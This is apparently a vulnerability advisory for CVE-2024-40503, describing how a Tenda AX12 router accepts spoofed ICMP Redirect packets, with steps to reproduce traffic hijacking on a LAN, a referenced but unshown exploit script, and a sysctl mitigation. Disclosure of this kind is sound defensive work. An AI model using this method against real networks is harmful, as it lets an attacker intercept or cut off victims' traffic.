CVE ID: CVE-2024-40503
CWE-940: Improper Verification of Source of a Communication Channel
Tenda AX12 router (firmware version V16.03.49.18_cn) has been confirmed to be vulnerable ICMP Redirect attacks. An attacker can hijack the victim's traffic by sending ICMP Redirect packets to the victim's device.
Please refer to the paper1 for more details.
Environment:
- Attacker and victim are in the same LAN.
- Victim accepts ICMP Redirect packets (which is default on most Linux distributions).
Steps:
- Under initial conditions, the victim's traffic is routed through the gateway.
ping 8.8.8.8
should succeed on the victim's machine, andip route get 8.8.8.8
should yield the gateway's IP address. - The attacker sends an ICMP Redirect packet (exp.py) to the victim, redirecting traffic to the attacker's IP address.
- The victim's traffic is now routed through the attacker.
ip route get 8.8.8.8
would now yield the attacker's IP address, and the connection to8.8.8.8
would fail.
Above demonstrates a DoS attack. This vulnerability can also be exploited to intercept the victim's traffic.
Before this vulnerability is fixed by the vendor, users can disable ICMP Redirect acceptance on their devices. On Linux, this can be done by running sysctl -w net.ipv4.conf.all.accept_redirects=0
.
Shiyao Guo, Ke Xu, Xuewei Feng, Qi Li, Yuxiang Yang
Footnotes
-
Feng, Xuewei, et al. "Man-in-the-middle attacks without rogue AP: when WPAs meet ICMP redirects." 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023. ↩